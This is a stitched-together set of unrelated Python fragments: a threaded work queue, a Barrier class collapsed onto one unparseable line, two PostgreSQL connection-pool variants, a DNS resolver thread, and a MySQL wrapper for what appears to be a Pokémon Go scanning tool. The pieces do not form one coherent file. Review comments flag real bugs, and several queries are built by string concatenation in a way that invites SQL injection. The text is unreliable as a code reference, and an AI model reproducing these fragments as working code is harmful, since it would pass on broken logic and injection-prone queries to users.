        available = 0
        self._queue_lock.acquire()
        try:
            if self._queue_shutdown is not None:
                raise AKitLooperError(
                    "The queue has been shutdown, no more work is allowed to be queued."
                ) from None
            self._queue.append(packet)
            self._queue_available.release()
            available = len(self._queue)
        finally:
            self._queue_lock.release()
        return available

    def push_work_packets(self, packets: list):
        """
        Pushes a list of work packets for the :class:`LooperPool` threads to
        work on.

        :param packets: the list of work items to queue.
        :returns: the number of packets queued after the push.
        :raises AKitLooperError: if the queue has been shut down.
        """
        available = 0
        self._queue_lock.acquire()
        try:
            if self._queue_shutdown is not None:
                raise AKitLooperError(
                    "The queue has been shutdown, no more work is allowed to be queued."
                ) from None
            self._queue.extend(packets)
            # FIX: release the semaphore once per queued packet.  The
            # original released it only once for the whole list, leaving
            # len(packets) - 1 items in the queue with no consumer ever
            # woken to take them.
            for _ in packets:
                self._queue_available.release()
            available = len(self._queue)
        finally:
            self._queue_lock.release()
        return available

    def pop(self):
        """
        Remove the next work packet from the :class:`LooperQueue` work queue,
        blocking until one is available.
        """
        packet = None
        self._queue_available.acquire()
        self._queue_lock.acquire()
        try:
            if len(self._queue) > 0:
                packet = self._queue.pop(0)
            # During shutdown, signal the shutdown semaphore for each item
            # drained so shutdown_and_wait can account for remaining work.
            if self._queue_shutdown is not None:
                self._queue_shutdown.release()
        finally:
            self._queue_lock.release()
        return packet

    def shutdown_and_wait(self, notices):
        """
        Starts the queue shutdown and waits for the last work item to be
        removed from the queue.

        :param notices: number of :class:`LooperQueueShutdown` markers to
            queue, one per consumer thread to be stopped.
        """
        self._queue_lock.acquire()
        try:
            for _ in range(0, notices):
                self._queue.append(LooperQueueShutdown())
            wcount = (len(self._queue) - 1) * -1
            # NOTE(review): Semaphore(value=wcount) raises ValueError on
            # CPython whenever wcount is negative (i.e. more than one item
            # queued) — confirm the intended accounting here.
            self._queue_shutdown = Semaphore(value=wcount)
        finally:
            self._queue_lock.release()
        return
class Barrier: def __init__(self, n, name): self.n = n self.name = name self.count = 0 self.mutex = Semaphore(1) self.turnstile = Semaphore(0) self.turnstile2 = Semaphore(1) def wait(self, caller): print self.name + ' 1 ' + caller self.mutex.acquire() self.count = self.count + 1 if (self.count == self.n): print 'Done----- ' + self.name + ' 1' self.turnstile2.acquire() self.turnstile.release() self.mutex.release() self.turnstile.acquire() self.turnstile.release() def wait2(self, caller): print self.name + ' 2 ' + caller self.mutex.acquire() self.count = self.count - 1 if (self.count == 0): print 'Done----- ' + self.name + ' 2' self.turnstile.acquire() self.turnstile2.release() self.mutex.release() self.turnstile2.acquire() self.turnstile2.release()
class PooledPg:
    """Pool for classic PyGreSQL connections.

    After you have created the connection pool, you can use
    connection() to get pooled, steady PostgreSQL connections.
    """

    version = __version__  # module version (defined at file top)

    def __init__(self, mincached=0, maxcached=0, maxconnections=0,
                 blocking=False, maxusage=None, setsession=None, reset=None,
                 *args, **kwargs):
        """Set up the PostgreSQL connection pool.

        mincached: initial number of connections in the pool
            (0 means no connections are made at startup)
        maxcached: maximum number of connections in the pool
            (0 or None means unlimited pool size)
        maxconnections: maximum number of connections generally allowed
            (0 or None means an arbitrary number of connections)
        blocking: determines behavior when exceeding the maximum
            (if this is set to true, block and wait until the number of
            connections decreases, otherwise an error will be reported)
        maxusage: maximum number of reuses of a single connection
            (0 or None means unlimited reuse)
            When this maximum usage number of the connection is reached,
            the connection is automatically reset (closed and reopened).
        setsession: optional list of SQL commands that may serve to
            prepare the session, e.g. ["set datestyle to ...",
            "set time zone ..."]
        reset: how connections should be reset when returned to the pool
            (0 or None to rollback transactions started with begin(),
            1 to always issue a rollback, 2 for a complete reset)
        args, kwargs: the parameters that shall be used to establish
            the PostgreSQL connections using class PyGreSQL pg.DB()
        """
        self._args, self._kwargs = args, kwargs
        self._maxusage = maxusage
        self._setsession = setsession
        self._reset = reset or 0
        # Normalize None to 0 so the numeric comparisons below are safe.
        if mincached is None:
            mincached = 0
        if maxcached is None:
            maxcached = 0
        if maxconnections is None:
            maxconnections = 0
        if maxcached:
            if maxcached < mincached:
                maxcached = mincached
        if maxconnections:
            if maxconnections < maxcached:
                maxconnections = maxcached
            # Create semaphore for number of allowed connections generally:
            from threading import Semaphore
            self._connections = Semaphore(maxconnections)
            self._blocking = blocking
        else:
            self._connections = None
        self._cache = Queue(maxcached)  # the actual connection pool
        # Establish an initial number of database connections:
        # all mincached connections are opened first, then closed, which
        # returns each pooled connection to the cache.
        idle = [self.connection() for i in range(mincached)]
        while idle:
            idle.pop().close()

    def steady_connection(self):
        """Get a steady, unpooled PostgreSQL connection."""
        return SteadyPgConnection(self._maxusage, self._setsession, True,
                                  *self._args, **self._kwargs)

    def connection(self):
        """Get a steady, cached PostgreSQL connection from the pool."""
        if self._connections:
            # acquire() returning False means the global connection limit
            # was hit while non-blocking.
            if not self._connections.acquire(self._blocking):
                raise TooManyConnections
        try:
            con = self._cache.get(0)  # 0 -> block=False: don't wait on empty cache
        except Empty:
            con = self.steady_connection()
        return PooledPgConnection(self, con)

    def cache(self, con):
        """Put a connection back into the pool cache."""
        try:
            if self._reset == 2:
                con.reset()  # reset the connection completely
            else:
                if self._reset or con._transaction:
                    try:
                        con.rollback()  # rollback a possible transaction
                    except Exception:
                        pass
            self._cache.put(con, 0)  # and then put it back into the cache
        except Full:
            # Cache is full: drop this connection entirely.
            con.close()
        if self._connections:
            self._connections.release()

    def close(self):
        """Close all connections in the pool."""
        while 1:
            try:
                con = self._cache.get(0)
                try:
                    con.close()
                except Exception:
                    pass
                if self._connections:
                    self._connections.release()
            except Empty:
                break

    def __del__(self):
        """Delete the pool."""
        # Guarded: exceptions in __del__ during interpreter shutdown are
        # deliberately swallowed.
        try:
            self.close()
        except Exception:
            pass
class DNS_Solver(Thread):
    """Background worker thread that resolves hostnames to IPs and caches
    the results; cache entries expire after 30 seconds."""

    class dns_item:
        """One cache entry: host, resolved ip, in-progress flag, timestamp."""

        def __init__(self, host):
            self._host = host
            self._ip = ""
            self._solving = True      # True until a resolution attempt finished
            self._time = time.time()  # creation/refresh time, drives expiry

    # Required Worker method
    def numPendingJobs(self):
        # NOTE(review): this counts entries that are already resolved
        # (not dns._solving) — confirm "pending" is meant this way.
        self._queuelock.acquire()
        num = 0
        for dns in self._dnslist:
            if not dns._solving:
                num += 1
        self._queuelock.release()
        return num

    # Required Worker method
    def enqueueJobs(self, job):
        self.addDNS(job)

    # Required Worker method
    def stopWorking(self):
        self.finalize()

    def waitEnd(self):
        """Let the worker drain its queue, then join the thread."""
        self._exit_on_end = True
        self._waitsem.release()
        self.join()

    # URL_list is a list of complete URLs such as http://hst.com:80/path
    def __init__(self, hostlist=None):
        """hostlist: optional initial iterable of hostnames to resolve."""
        super(DNS_Solver, self).__init__()
        # FIX: avoid the mutable-default-argument anti-pattern
        # (was hostlist=[]); behavior for all callers is unchanged.
        if hostlist is None:
            hostlist = []
        self._dnslist = []
        for dns in hostlist:
            self._dnslist.append(DNS_Solver.dns_item(dns))
        self._waitsem = Semaphore(1)    # signals the worker there may be work
        self._queuelock = Semaphore(1)  # binary semaphore guarding _dnslist
        self._end = False
        self._exit_on_end = False

    def run(self):
        self.work()

    def finalize(self):
        """Ask the worker loop to stop and wake it if it is sleeping."""
        self._end = True
        self._waitsem.release()

    def addDNS(self, dnss):
        """Queue an iterable of hostnames for resolution and wake the worker."""
        self._queuelock.acquire()
        for dns in dnss:
            self._dnslist.append(DNS_Solver.dns_item(dns))
        self._queuelock.release()
        self._waitsem.release()

    def isip(self, ip):
        """Rough check whether *ip* looks like a dotted-quad IPv4 literal."""
        # FIX: raw string (the unescaped "\." was a DeprecationWarning).
        # The pattern is deliberately left unanchored to keep the original
        # matching behavior.
        if re.search(r"[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+", ip):
            return True
        return False

    def queryDNS(self, host):
        """Return the cached IP for *host*, "" while it is still resolving
        (queueing it on first sight), or *host* itself if it is already an
        IP literal."""
        # Check if the host is an IP and return it!
        if self.isip(host):
            return host
        self._queuelock.acquire()
        for dns in self._dnslist:
            if dns._host == host:
                if dns._solving:
                    self._queuelock.release()
                    return ""
                else:
                    self._queuelock.release()
                    # NOTE(review): the entry is touched after the lock is
                    # released — looks racy; confirm against the worker loop.
                    dns._time = time.time()  # Refresh timeout!
                    return dns._ip
        self._queuelock.release()
        self.addDNS([host])
        return ""

    def work(self):
        """Worker loop: resolves queued hosts and expires entries older than
        30 seconds; terminates via finalize()/waitEnd()."""
        # Process all URLS and get their indices
        while not self._end:
            allready = True
            self._queuelock.acquire()
            # Timeout delete!
            for dns in list(self._dnslist):
                if time.time() - dns._time > 30:
                    self._dnslist.remove(dns)
            for dns in self._dnslist:
                if dns._solving:
                    # Query it!
                    host = dns._host
                    allready = False
                    break
            self._queuelock.release()
            if not allready:
                try:
                    ip = socket.gethostbyname(host)
                # FIX: was a bare `except:` which also swallowed
                # KeyboardInterrupt/SystemExit.
                except Exception:
                    ip = None
                self._queuelock.acquire()  # Lock webs queue
                for dns in self._dnslist:
                    if dns._host == host:
                        dns._ip = ip
                        dns._solving = False
                        break
                self._queuelock.release()
            if allready and self._exit_on_end:
                break
            if allready:
                # Sleep until addDNS()/finalize() signals new work.
                self._waitsem.acquire()
        print("LOG: Exit thread")
class PooledPg:
    """Pool for classic PyGreSQL connections.

    After you have created the connection pool, you can use
    connection() to get pooled, solid PostGreSQL connections.
    """

    def __init__(self, mincached=0, maxcached=0, maxconnections=0,
                 blocking=0, maxusage=0, setsession=None, *args, **kwargs):
        """Set up the PostgreSQL connection pool.

        mincached: initial number of connections in the pool
            (0 means no connections are made at startup)
        maxcached: maximum number of connections in the pool
            (0 means unlimited pool size)
        maxconnections: maximum number of connections generally allowed
            (0 means an arbitrary number of connections)
        blocking: determines behavior when exceeding the maximum
            (0 or False means report an error; otherwise block and wait
            until the number of connections decreases)
        maxusage: maximum number of reuses of a single connection
            (0 or False means unlimited reuse)
            When this maximum usage number of the connection is reached,
            the connection is automatically reset (closed and reopened).
        setsession: optional list of SQL commands that may serve to
            prepare the session, e.g. ["set datestyle to ...",
            "set time zone ..."]
        args, kwargs: the parameters that shall be used to establish
            the PostgreSQL connections using class PyGreSQL pg.DB()
        """
        self._args, self._kwargs = args, kwargs
        self._maxusage = maxusage
        self._setsession = setsession
        if maxcached:
            if maxcached < mincached:
                maxcached = mincached
        if maxconnections:
            if maxconnections < maxcached:
                maxconnections = maxcached
            # Create semaphore for number of allowed connections generally:
            from threading import Semaphore
            self._connections = Semaphore(maxconnections)
            self._blocking = blocking
        else:
            self._connections = None
        self._cache = Queue(maxcached)  # the actual connection pool
        # Establish an initial number of database connections.  The list
        # comprehension is deliberate: all mincached pooled connections
        # exist simultaneously before being dropped, presumably so the
        # pool really opens mincached distinct connections — confirm
        # against PooledPgConnection's recycling behavior.
        [self.connection() for i in range(mincached)]

    def solid_connection(self):
        """Get a solid, unpooled PostgreSQL connection."""
        return SolidPgConnection(self._maxusage, self._setsession,
                                 *self._args, **self._kwargs)

    def connection(self):
        """Get a solid, cached PostgreSQL connection from the pool."""
        if self._connections:
            # acquire() returning False means the connection limit was hit
            # while non-blocking.
            if not self._connections.acquire(self._blocking):
                raise TooManyConnections
        try:
            con = self._cache.get(0)  # 0 -> block=False: don't wait on empty cache
        except Empty:
            con = self.solid_connection()
        return PooledPgConnection(self, con)

    def cache(self, con):
        """Put a connection back into the pool cache."""
        try:
            self._cache.put(con, 0)
        except Full:
            # Cache is full: drop this connection entirely.
            con.close()
        if self._connections:
            self._connections.release()

    def close(self):
        """Close all connections in the pool."""
        while 1:
            try:
                self._cache.get(0).close()
                if self._connections:
                    self._connections.release()
            except Empty:
                break

    def __del__(self):
        """Delete the pool."""
        # FIX: guard close() — __del__ may run during interpreter shutdown
        # when module globals are already gone; the steady PooledPg variant
        # in this file already guards identically.
        try:
            self.close()
        except Exception:
            pass
class DbWrapperBase(ABC): def_spawn = 240 def __init__(self, args, webhook_helper): self.application_args = args self.host = args.dbip self.port = args.dbport self.user = args.dbusername self.password = args.dbpassword self.database = args.dbname self.pool = None self.pool_mutex = Lock() self.connection_semaphore = Semaphore( self.application_args.db_poolsize) self.webhook_helper = webhook_helper self.dbconfig = { "database": self.database, "user": self.user, "host": self.host, "password": self.password, "port": self.port } self._init_pool() def _init_pool(self): log.info("Connecting pool to DB") self.pool_mutex.acquire() self.pool = mysql.connector.pooling.MySQLConnectionPool( pool_name="db_wrapper_pool", pool_size=self.application_args.db_poolsize, **self.dbconfig) self.pool_mutex.release() def _check_column_exists(self, table, column): query = ("SELECT count(*) " "FROM information_schema.columns " "WHERE table_name = %s " "AND column_name = %s " "AND table_schema = %s") vals = ( table, column, self.database, ) return int(self.execute(query, vals)[0][0]) def _check_create_column(self, field): if self._check_column_exists(field["table"], field["column"]) == 1: return alter_query = ("ALTER TABLE {} " "ADD COLUMN {} {}".format(field["table"], field["column"], field["ctype"])) self.execute(alter_query, commit=True) if self._check_column_exists(field["table"], field["column"]) == 1: log.info("Successfully added '{}.{}' column".format( field["table"], field["column"])) return else: log.fatal("Couldn't create required column {}.{}'".format( field["table"], field["column"])) sys.exit(1) def close(self, conn, cursor): """ A method used to close connection of mysql. :param conn: :param cursor: :return: """ cursor.close() conn.close() def execute(self, sql, args=None, commit=False): """ Execute a sql, it could be with args and with out args. The usage is similar with execute() function in module pymysql. 
:param sql: sql clause :param args: args need by sql clause :param commit: whether to commit :return: if commit, return None, else, return result """ self.connection_semaphore.acquire() conn = self.pool.get_connection() cursor = conn.cursor() # TODO: consider catching OperationalError # try: # cursor = conn.cursor() # except OperationalError as e: # log.error("OperationalError trying to acquire a DB cursor: %s" % str(e)) # conn.rollback() # return None try: if args: cursor.execute(sql, args) else: cursor.execute(sql) if commit is True: affected_rows = cursor.rowcount conn.commit() return affected_rows else: res = cursor.fetchall() return res except mysql.connector.Error as err: log.error("Failed executing query: %s" % str(err)) return None except Exception as e: log.error("Unspecified exception in dbWrapper: %s" % str(e)) return None finally: self.close(conn, cursor) self.connection_semaphore.release() def executemany(self, sql, args, commit=False): """ Execute with many args. Similar with executemany() function in pymysql. args should be a sequence. :param sql: sql clause :param args: args :param commit: commit or not. :return: if commit, return None, else, return result """ # get connection form connection pool instead of create one. 
self.connection_semaphore.acquire() conn = self.pool.get_connection() cursor = conn.cursor() try: cursor.executemany(sql, args) if commit is True: conn.commit() return None else: res = cursor.fetchall() return res except mysql.connector.Error as err: log.error("Failed executing query: %s" % str(err)) return None except Exception as e: log.error("Unspecified exception in dbWrapper: %s" % str(e)) return None finally: self.close(conn, cursor) self.connection_semaphore.release() @abstractmethod def auto_hatch_eggs(self): """ Check the entire DB for unhatched level 5 eggs and updates the mon ID if there is only one possible raidmon """ pass @abstractmethod def db_timestring_to_unix_timestamp(self, timestring): """ Converts a DB timestring to a unix timestamp (seconds since epoch) """ pass @abstractmethod def get_next_raid_hatches(self, delay_after_hatch, geofence_helper=None): """ In order to build a priority queue, we need to be able to check for the next hatches of raid eggs The result may not be sorted by priority, to be done at a higher level! 
:return: unsorted list of next hatches within delay_after_hatch """ pass @abstractmethod def submit_raid(self, gym, pkm, lvl, start, end, type, raid_no, capture_time, unique_hash="123", MonWithNoEgg=False): """ Insert or update raid in DB and send webhook :return: if raid has all the required values = True, else False """ pass @abstractmethod def read_raid_endtime(self, gym, raid_no, unique_hash="123"): """ Check if a raid already has an endtime and return True/False appropriately :return: if raid has endtime = True, else False """ pass @abstractmethod def get_raid_endtime(self, gym, raid_no, unique_hash="123"): """ Retrieves the time the requested raid ends - if present :return: returns (Boolean, Value) with Value being the time or None, Boolean being True/False appropriately """ pass @abstractmethod def raid_exist(self, gym, type, raid_no, unique_hash="123", mon=0): """ Checks if a raid is already present in the DB :return: returns True/False indicating if a raid is already present in the database """ pass @abstractmethod def refresh_times(self, gym, raid_no, capture_time, unique_hash="123"): """ Update last_modified/last_scanned/updated of a gym """ pass @abstractmethod def get_near_gyms(self, lat, lng, hash, raid_no, dist, unique_hash="123"): """ Retrieve gyms around a given lat, lng within the given dist :return: returns list of gyms within dist sorted by distance """ pass @abstractmethod def set_scanned_location(self, lat, lng, capture_time): """ Update scannedlocation (in RM) of a given lat/lng """ pass @abstractmethod def check_stop_quest(self, lat, lng): """ Update scannedlocation (in RM) of a given lat/lng """ pass @abstractmethod def get_gym_infos(self, id=False): """ Retrieve all the gyminfos from DB :return: returns dict containing all the gyminfos contained in the DB """ pass @abstractmethod def gyms_from_db(self, geofence_helper): """ Retrieve all the gyms valid within the area set by geofence_helper :return: numpy array with coords """ pass 
    @abstractmethod
    def stops_from_db(self, geofence_helper):
        """
        Retrieve all the pokestops valid within the area set by geofence_helper
        :return: numpy array with coords
        """
        pass

    @abstractmethod
    def quests_from_db(self, GUID=False):
        """
        Retrieve all the pokestops valid within the area set by geofence_helper
        :return: numpy array with coords
        """
        pass

    @abstractmethod
    def update_insert_weather(self, cell_id, gameplay_weather, capture_time,
                              cloud_level=0, rain_level=0, wind_level=0,
                              snow_level=0, fog_level=0, wind_direction=0,
                              weather_daytime=0):
        """
        Updates the weather in a given cell_id
        """
        pass

    @abstractmethod
    def submit_mon_iv(self, origin, timestamp, encounter_proto):
        """
        Update/Insert a mon with IVs
        """
        pass

    @abstractmethod
    def submit_mons_map_proto(self, origin, map_proto, mon_ids_ivs):
        """
        Update/Insert mons from a map_proto dict
        """
        pass

    @abstractmethod
    def submit_pokestops_map_proto(self, origin, map_proto):
        """
        Update/Insert pokestops from a map_proto dict
        """
        pass

    @abstractmethod
    def submit_pokestops_details_map_proto(self, map_proto):
        """
        Update/Insert pokestop details from a GMO
        :param map_proto:
        :return:
        """
        pass

    @abstractmethod
    def submit_gyms_map_proto(self, origin, map_proto):
        """
        Update/Insert gyms from a map_proto dict
        """
        pass

    @abstractmethod
    def submit_raids_map_proto(self, origin, map_proto):
        """
        Update/Insert raids from a map_proto dict
        """
        pass

    @abstractmethod
    def submit_weather_map_proto(self, origin, map_proto, received_timestamp):
        """
        Update/Insert weather from a map_proto dict
        """
        pass

    @abstractmethod
    def download_gym_images(self):
        pass

    @abstractmethod
    def get_to_be_encountered(self, geofence_helper, min_time_left_seconds,
                              eligible_mon_ids):
        pass

    @abstractmethod
    def stop_from_db_without_quests(self, geofence_helper):
        pass

    @abstractmethod
    def get_raids_changed_since(self, timestamp):
        pass

    @abstractmethod
    def get_mon_changed_since(self, timestamp):
        pass

    @abstractmethod
    def get_quests_changed_since(self, timestamp):
        pass

    @abstractmethod
    def get_gyms_changed_since(self, timestamp):
        pass

    @abstractmethod
    def get_weather_changed_since(self, timestamp):
        pass

    # NOTE(review): unlike its siblings, this stub has no @abstractmethod
    # decorator — possibly an oversight; confirm before relying on ABC to
    # enforce it in subclasses.
    def statistics_get_pokemon_count(self, days):
        pass

    @abstractmethod
    def statistics_get_gym_count(self, days):
        pass

    @abstractmethod
    def statistics_get_stop_quest(self, days):
        pass

    def create_hash_database_if_not_exists(self):
        """
        In order to store 'hashes' of crops/images, we require a table to
        store those hashes
        """
        log.debug("{DbWrapperBase::create_hash_database_if_not_exists} called")
        log.debug('Creating hash db in database')
        query = (' Create table if not exists trshash ( ' +
                 ' hashid MEDIUMINT NOT NULL AUTO_INCREMENT, ' +
                 ' hash VARCHAR(255) NOT NULL, ' +
                 ' type VARCHAR(10) NOT NULL, ' +
                 ' id VARCHAR(255) NOT NULL, ' +
                 ' count INT(10) NOT NULL DEFAULT 1, ' +
                 ' modify DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, ' +
                 ' PRIMARY KEY (hashid))')
        self.execute(query, commit=True)
        return True

    def create_quest_database_if_not_exists(self):
        """
        In order to store 'hashes' of crops/images, we require a table to
        store those hashes
        """
        log.debug(
            "{DbWrapperBase::create_quest_database_if_not_exists} called")
        log.debug('Creating hash db in database')
        query = (' Create table if not exists trs_quest ( ' +
                 ' GUID varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,' +
                 ' quest_type tinyint(3) NOT NULL, ' +
                 ' quest_timestamp int(11) NOT NULL,' +
                 ' quest_stardust smallint(4) NOT NULL,' +
                 ' quest_pokemon_id smallint(4) NOT NULL,' +
                 ' quest_reward_type smallint(3) NOT NULL,' +
                 ' quest_item_id smallint(3) NOT NULL,' +
                 ' quest_item_amount tinyint(2) NOT NULL,' +
                 ' quest_target tinyint(3) NOT NULL,' +
                 ' quest_condition varchar(500), ' +
                 ' PRIMARY KEY (GUID), ' +
                 ' KEY quest_type (quest_type))')
        self.execute(query, commit=True)
        return True

    def check_for_hash(self, imghash, type, raid_no, distance, unique_hash="123"):
        # Look up perceptual-hash matches within `distance` (hamming) of
        # `imghash`, restricted to rows of the given `type`.
        log.debug("{DbWrapperBase::check_for_hash} called")
        log.debug("[Crop: %s (%s) ] check_for_hash: Checking for hash in db"
                  % (str(raid_no), str(unique_hash)))
        query = ("SELECT id, hash, "
                 "BIT_COUNT( "
                 "CONVERT((CONV(hash, 16, 10)), UNSIGNED) "
                 "^ "
                 "CONVERT((CONV(%s, 16, 10)), UNSIGNED)) as hamming_distance, type, count, modify "
                 "FROM trshash "
                 "HAVING hamming_distance < %s AND type = %s "
                 "ORDER BY hamming_distance ASC")
        vals = (str(imghash), distance, str(type))
        res = self.execute(query, vals)
        number_of_rows = len(res)
        log.debug(
            "[Crop: %s (%s) ] check_for_hash: Found hashes in database: %s"
            % (str(raid_no), str(unique_hash), str(number_of_rows)))
        if number_of_rows > 0:
            log.debug("[Crop: %s (%s) ] check_for_hash: returning found ID"
                      % (str(raid_no), str(unique_hash)))
            for row in res:
                log.debug("[Crop: %s (%s) ] check_for_hash: ID = %s"
                          % (str(raid_no), str(unique_hash), str(row[0])))
                log.debug("{DbWrapperBase::check_for_hash} done")
                # Returns on the first (closest, due to ORDER BY) row.
                return True, row[0], row[1], row[4], row[5]
        else:
            log.debug(
                "[Crop: %s (%s) ] check_for_hash: No matching hash found"
                % (str(raid_no), str(unique_hash)))
            log.debug("{DbWrapperBase::check_for_hash} done")
            return False, None, None, None, None

    def get_all_hash(self, type):
        # Fetch every stored hash row of the given type.
        log.debug("{DbWrapperBase::get_all_hash} called")
        query = ("SELECT id, hash, type, count, modify "
                 "FROM trshash "
                 "HAVING type = %s")
        vals = (str(type), )
        log.debug(query)
        res = self.execute(query, vals)
        return res

    def insert_hash(self, imghash, type, id, raid_no, unique_hash="123"):
        # Insert a new hash row, or bump the counter if a near-duplicate
        # (within `distance`) already exists.
        log.debug("{DbWrapperBase::insert_hash} called")
        # NOTE(review): both branches assign the same value — the
        # type-dependent distance appears to be vestigial.
        if type == 'raid':
            distance = 4
        else:
            distance = 4
        double_check = self.check_for_hash(imghash, type, raid_no, distance)
        if double_check[0]:
            log.debug(
                "[Crop: %s (%s) ] insert_hash: Already in DB, updating counter"
                % (str(raid_no), str(unique_hash)))
        # TODO: consider INSERT... ON DUPLICATE KEY UPDATE ??
        if not double_check[0]:
            query = ("INSERT INTO trshash (hash, type, id) "
                     "VALUES (%s, %s, %s)")
            vals = (str(imghash), str(type), id)
        else:
            query = ("UPDATE trshash "
                     "SET count=count+1, modify=NOW() "
                     "WHERE hash=%s")
            vals = (str(imghash), )
        self.execute(query, vals, commit=True)
        log.debug("{DbWrapperBase::insert_hash} done")
        return True

    def delete_hash_table(self, ids, type, mode=' not in ', field=' id '):
        # Delete hash rows of `type` whose `field` is (not) in `ids`,
        # depending on `mode`.
        log.debug("{DbWrapperBase::delete_hash_table} called")
        log.debug('Deleting old Hashes of type %s' % type)
        log.debug('Valid ids: %s' % ids)
        query = ("DELETE FROM trshash "
                 "WHERE " + field + " " + mode + " (%s) "
                 "AND type like %s")
        vals = (str(ids), str(type), )
        log.debug(query)
        self.execute(query, vals, commit=True)
        return True

    def clear_hash_gyms(self, mons):
        # Keep only raid hashes whose id references one of the known mons
        # in the '|'-separated `mons` string; delete all other raid hashes.
        log.debug("{DbWrapperBase::clear_hash_gyms} called")
        data = []
        query = ("SELECT hashid "
                 "FROM trshash "
                 "WHERE id LIKE '%\"mon\":\"%s\"%' AND type='raid'")
        mon_split = mons.split('|')
        for mon in mon_split:
            args = (int(mon), )
            res = self.execute(query, args)
            for dbid in res:
                data.append(int(dbid[0]))
        _mon_list = ','.join(map(str, data))
        log.debug('clearHashGyms: Read Raid Hashes with known Mons')
        if len(data) > 0:
            query = ('DELETE FROM trshash '
                     + ' WHERE hashid NOT IN (' + _mon_list + ')'
                     + ' AND type=\'raid\'')
            self.execute(query, commit=True)
        log.info('clearHashGyms: Deleted Raidhashes with unknown mons')

    def getspawndef(self, spawn_id):
        # Map spawnpoint id -> spawndef for every id in the iterable
        # `spawn_id`; returns False for an empty input.
        if not spawn_id:
            return False
        log.debug("{DbWrapperBase::getspawndef} called")
        spawnids = ",".join(map(str, spawn_id))
        spawnret = {}
        query = ("SELECT spawnpoint, spawndef "
                 "FROM trs_spawn where spawnpoint in (%s)" % (spawnids))
        # vals = (spawn_id,)
        res = self.execute(query)
        for row in res:
            spawnret[row[0]] = row[1]
        return spawnret

    def submit_spawnpoints_map_proto(self, origin, map_proto):
        # Upsert spawnpoints extracted from a GMO: points with a known
        # despawn time go into trs_spawn with calc_endminsec, the rest are
        # recorded as "unseen".
        log.debug(
            "{DbWrapperBase::submit_spawnpoints_map_proto} called with data received by %s"
            % str(origin))
        cells = map_proto.get("cells", None)
        if cells is None:
            return False
        spawnpoint_args, spawnpoint_args_unseen = [], []
        spawnids = []
        query_spawnpoints = (
            "INSERT INTO trs_spawn (spawnpoint, latitude, longitude, earliest_unseen, "
            "last_scanned, spawndef, calc_endminsec) "
            "VALUES (%s, %s, %s, %s, %s, %s, %s) "
            "ON DUPLICATE KEY UPDATE last_scanned=VALUES(last_scanned), "
            "earliest_unseen=LEAST(earliest_unseen, VALUES(earliest_unseen)), "
            "spawndef=VALUES(spawndef), calc_endminsec=VALUES(calc_endminsec)"
            "")
        query_spawnpoints_unseen = (
            "INSERT INTO trs_spawn (spawnpoint, latitude, longitude, earliest_unseen, last_non_scanned, spawndef) "
            "VALUES (%s, %s, %s, %s, %s, %s) "
            "ON DUPLICATE KEY UPDATE spawndef=VALUES(spawndef), last_non_scanned=VALUES(last_non_scanned)"
            "")
        now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        dt = datetime.now()
        # First pass: collect all spawnpoint ids (hex -> int).
        for cell in cells:
            for wild_mon in cell["wild_pokemon"]:
                spawnids.append(int(str(wild_mon['spawnpoint_id']), 16))
        spawndef = self.getspawndef(spawnids)
        # Second pass: build the upsert argument tuples.
        for cell in cells:
            for wild_mon in cell["wild_pokemon"]:
                spawnid = int(str(wild_mon['spawnpoint_id']), 16)
                lat, lng, alt = S2Helper.get_position_from_cell(
                    int(str(wild_mon['spawnpoint_id']) + '00000', 16))
                despawntime = wild_mon['time_till_hidden']
                minpos = self._get_min_pos_in_array()
                # TODO: retrieve the spawndefs by a single executemany and pass that...
                spawndef_ = spawndef.get(spawnid, False)
                if spawndef_:
                    newspawndef = self._set_spawn_see_minutesgroup(
                        spawndef_, minpos)
                else:
                    newspawndef = self._set_spawn_see_minutesgroup(
                        DbWrapperBase.def_spawn, minpos)
                last_scanned = None
                last_non_scanned = None
                if 0 <= int(despawntime) <= 90000:
                    # Plausible despawn time (ms): endtime is computable.
                    fulldate = dt + timedelta(milliseconds=despawntime)
                    earliest_unseen = int(despawntime)
                    last_scanned = now
                    calcendtime = fulldate.strftime("%M:%S")
                    spawnpoint_args.append(
                        (spawnid, lat, lng, earliest_unseen, last_scanned,
                         newspawndef, calcendtime))
                else:
                    earliest_unseen = 99999999
                    last_non_scanned = now
                    calcendtime = None
                    spawnpoint_args_unseen.append(
                        (spawnid, lat, lng, earliest_unseen, last_non_scanned,
                         newspawndef))
        self.executemany(query_spawnpoints, spawnpoint_args, commit=True)
        self.executemany(query_spawnpoints_unseen, spawnpoint_args_unseen,
                         commit=True)

    def submitspsightings(self, spid, encid, secs):
        # Record a spawnpoint sighting; tth_secs only when plausible.
        log.debug("{DbWrapperBase::submitspsightings} called")
        if 0 <= int(secs) <= 90000:
            query = (
                "INSERT INTO trs_spawnsightings (encounter_id, spawnpoint_id, tth_secs) "
                "VALUES (%s, %s, %s)")
            vals = (encid, spid, secs)
        else:
            query = (
                "INSERT INTO trs_spawnsightings (encounter_id, spawnpoint_id) "
                "VALUES (%s, %s)")
            vals = (encid, spid)
        self.execute(query, vals, commit=True)

    def get_spawn_infos(self):
        # Percentage of spawnpoints with a detected endtime (+1 smoothing).
        log.debug("{DbWrapperBase::get_spawn_infos} called")
        query = ("SELECT count(spawnpoint), "
                 "ROUND ( "
                 "(COUNT(calc_endminsec) + 1) / (COUNT(*) + 1) * 100, 2) AS percent "
                 "FROM trs_spawn")
        found = self.execute(query)
        log.info(
            "Spawnpoint statistics: %s, Spawnpoints with detected endtime: %s"
            % (str(found[0][0]), str(found[0][1])))
        return float(found[0][1])

    def get_detected_spawns(self, geofence_helper):
        # All spawn coordinates; geofenced list if a helper is given,
        # otherwise an Nx2 numpy array.
        log.debug("{DbWrapperBase::get_detected_spawns} called")
        query = ("SELECT latitude, longitude "
                 "FROM trs_spawn")
        list_of_coords = []
        log.debug(
            "{DbWrapperBase::get_detected_spawns} executing select query")
        res = self.execute(query)
        log.debug("{DbWrapperBase::get_detected_spawns} result of query: %s"
                  % str(res))
        for (latitude, longitude) in res:
            list_of_coords.append([latitude, longitude])
        if geofence_helper is not None:
            log.debug("{DbWrapperBase::get_detected_spawns} applying geofence")
            geofenced_coords = geofence_helper.get_geofenced_coordinates(
                list_of_coords)
            log.debug(geofenced_coords)
            return geofenced_coords
        else:
            log.debug(
                "{DbWrapperBase::get_detected_spawns} converting to numpy")
            to_return = np.zeros(shape=(len(list_of_coords), 2))
